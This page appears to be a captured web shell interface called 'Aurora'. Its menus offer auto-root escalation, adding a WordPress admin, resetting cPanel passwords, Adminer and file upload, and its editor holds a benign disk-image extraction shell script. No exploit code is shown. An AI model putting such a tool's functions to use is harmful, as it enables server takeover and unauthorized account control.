Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
Root
usr
local
bin
Upload
New Folder
New File
Name
Size
Permissions
Actions
..
-
-
-
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: extract-image
#!/bin/bash # Intended to be called from the root.d cloud-image script as follows: # $TMP_HOOKS_PATH/bin/extract-image $BASE_IMAGE_FILE $BASE_IMAGE_TAR $IMAGE_LOCATION $CACHED_IMAGE if [ ${DIB_DEBUG_TRACE:-0} -gt 0 ]; then set -x fi set -eu set -o pipefail BASE_IMAGE_FILE=$1 BASE_IMAGE_TAR=$2 IMAGE_LOCATION=$3 CACHED_IMAGE=$4 CACHED_TAR=$DIB_IMAGE_CACHE/$BASE_IMAGE_TAR DIB_LOCAL_IMAGE=${DIB_LOCAL_IMAGE:-""} TAR_LOCK=$CACHED_TAR.lock # GPT GUIDs of interest. # See https://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs # also https://systemd.io/BOOT_LOADER_SPECIFICATION/ GUID_EFI="c12a7328-f81f-11d2-ba4b-00a0c93ec93b" GUID_LINUX_BOOT="bc13c2ff-59e6-4262-a352-b275fd6f7172" function extract_image() { if [ -n "$DIB_OFFLINE" -a -f "$CACHED_TAR" ] ; then echo "Not checking freshness of cached $CACHED_TAR." else if [ -z "$DIB_LOCAL_IMAGE" ]; then echo "Fetching Base Image" # There seems to be some bad Fedora mirrors returning http 404's for the cloud image. # If the image fails to download due to a 404 we retry once. set +e $TMP_HOOKS_PATH/bin/cache-url $IMAGE_LOCATION $CACHED_IMAGE RV=$? set -e if [ "$RV" == "44" ] ; then $TMP_HOOKS_PATH/bin/cache-url $IMAGE_LOCATION $CACHED_IMAGE elif [ "$RV" != "0" ] ; then exit 1 fi fi if [ ! -f $CACHED_TAR -o \ $CACHED_IMAGE -nt $CACHED_TAR ] ; then echo "Repacking base image as tarball." WORKING=$(mktemp --tmpdir=${TMP_DIR:-/tmp} -d) EACTION="rm -r $WORKING" trap "$EACTION" EXIT echo "Working in $WORKING" RAW_FILE=$(mktemp --tmpdir=$WORKING XXXXXX.raw) if [ "${CACHED_IMAGE: -3}" == ".xz" ] ; then QCOW2_FILE=$(mktemp --tmpdir=$WORKING XXXXXX.qcow2) # This leaves the old image in place so cache-url wont get it again unxz --stdout $CACHED_IMAGE > $QCOW2_FILE CACHED_IMAGE=$QCOW2_FILE fi qemu-img convert -f qcow2 -O raw $CACHED_IMAGE $RAW_FILE # kpartx fails if no /dev/loop* exists, "losetup -f" prints first unused # loop device and creates it if it doesn't exist LOOPDEV_BASE=$(basename $(sudo losetup -f)) # add partition mappings sudo kpartx -av $RAW_FILE # If running inside Docker, make our nodes manually, because udev will not be working. if [ -f /.dockerenv ]; then sudo dmsetup --noudevsync mknodes fi if ! timeout 5 sh -c "while ! ls /dev/mapper/${LOOPDEV_BASE}p* ; do sleep 1; done"; then echo "Error: Could not find any ${LOOPDEV_BASE} devices" exit 1 fi EACTION="sudo kpartx -d $RAW_FILE ; $EACTION" trap "$EACTION" EXIT ROOT_LOOPDEV="" BOOT_LOOPDEV="" EFI_LOOPDEV="" LOOPDEVS=$(ls /dev/mapper/${LOOPDEV_BASE}p* | sort -r) LOOPDEV_COUNT=$(echo $LOOPDEVS | wc -w) if [ $LOOPDEV_COUNT == "1" ]; then # if there is one partition device, assume it is the root device ROOT_LOOPDEV=${LOOPDEVS} LOOPDEVS="" fi for LOOPDEV in ${LOOPDEVS}; do fstype=$(sudo blkid -o value -s TYPE -p "${LOOPDEV}" 2>/dev/null) label=$(sudo blkid -o value -s LABEL -p "${LOOPDEV}" 2>/dev/null) part_type=$(sudo blkid -o value -s PART_ENTRY_TYPE -p "${LOOPDEV}" 2>/dev/null) if [ -z "${fstype}" ]; then # Ignore block device with no filesystem type continue fi # look for EFI partition to mount at /boot/efi either by GUID or # label convention if [ -z "$EFI_LOOPDEV" ]; then if [[ ${part_type} == ${GUID_EFI} ]]; then EFI_LOOPDEV=$LOOPDEV continue fi fi # look for EFI partition to mount at /boot/efi either by GUID or # label convention. if [ -z "$BOOT_LOOPDEV" ]; then if [[ ${part_type} == ${GUID_LINUX_BOOT} || ${label} == "boot" ]]; then BOOT_LOOPDEV=$LOOPDEV continue fi fi if [ -z "$ROOT_LOOPDEV" ]; then ROOT_LOOPDEV=$LOOPDEV continue fi done mkdir $WORKING/mnt ROOT_FSTYPE=$(sudo blkid -o value -s TYPE $ROOT_LOOPDEV) if [ "xfs" = "$ROOT_FSTYPE" ]; then # mount xfs with nouuid, just in case that uuid is already mounted # use ro to avoid/workaround xfs uuid issues on older # kernels with newer rhel images which seem to set # flags to generate unique uuid's: # xfs superblock has incompatible features (0x4) # we don't need to worry about this, we just want the data MOUNTOPTS="-o nouuid,ro" elif [ "btrfs" = "$ROOT_FSTYPE" ]; then # Fedora has a btrfs filesystem with a subvolume called root. # For now assume there will be a 'root' subvolume, but in the # future the subvolume layout may need to be discovered for different # images MOUNTOPTS="-o subvol=root" else MOUNTOPTS="" fi sudo mount $MOUNTOPTS $ROOT_LOOPDEV $WORKING/mnt EACTION="sudo umount -f $WORKING/mnt ; $EACTION" trap "$EACTION" EXIT if [ ! -z "$BOOT_LOOPDEV" ]; then # mount to /boot BOOT_FSTYPE=$(sudo blkid -o value -s TYPE $ROOT_LOOPDEV) if [ "xfs" = "$BOOT_FSTYPE" ]; then BOOT_MOUNTOPTS="-o nouuid,ro" # Similar to root filesystem, if the boot filesystem # is XFS and the base OS is the same as the image being # rebuilt, we need to pass "nouuid" to bypass UUID safety # checks and successfully mounts so we can extract the # contents. else BOOT_MOUNTOPTS="" fi sudo mount $BOOT_MOUNTOPTS $BOOT_LOOPDEV $WORKING/mnt/boot EACTION="sudo umount -f $BOOT_LOOPDEV ; $EACTION" trap "$EACTION" EXIT fi if [ ! -z "$EFI_LOOPDEV" ]; then # mount to /boot/efi sudo mount $EFI_LOOPDEV $WORKING/mnt/boot/efi EACTION="sudo umount -f $EFI_LOOPDEV ; $EACTION" trap "$EACTION" EXIT fi # find out if chroot tar has full xattr support if [ 0 == `sudo chroot $WORKING/mnt bin/tar --help | grep -c xattrs-exclude` ]; then TAROPTS="--no-xattrs" else TAROPTS="--xattrs --xattrs-include=* --xattrs-exclude=security.selinux" fi # Chroot in so that we get the correct uid/gid sudo chroot $WORKING/mnt bin/tar $TAROPTS -cz . > $WORKING/tmp.tar mv $WORKING/tmp.tar $CACHED_TAR else echo "Using cached tar from $CACHED_TAR" fi fi # Extract the base image (use --numeric-owner to avoid UID/GID mismatch between # image tarball and host OS e.g. when building Fedora image on an openSUSE host) # Include all xattrs except selinux because the selinux ones cause issues in our # chroot environment, and we restore all of those at the end of the build anyway. echo "Extracting base root image from $CACHED_TAR" sudo tar -C $TARGET_ROOT --numeric-owner --xattrs --xattrs-include='*' --xattrs-exclude='security.selinux' -xzf $CACHED_TAR } ( echo "Getting $TAR_LOCK: $(date)" # Wait up to 20 minutes for another process to download if ! flock -w 1200 9 ; then echo "Did not get $TAR_LOCK: $(date)" exit 1 fi extract_image ) 9> $TAR_LOCK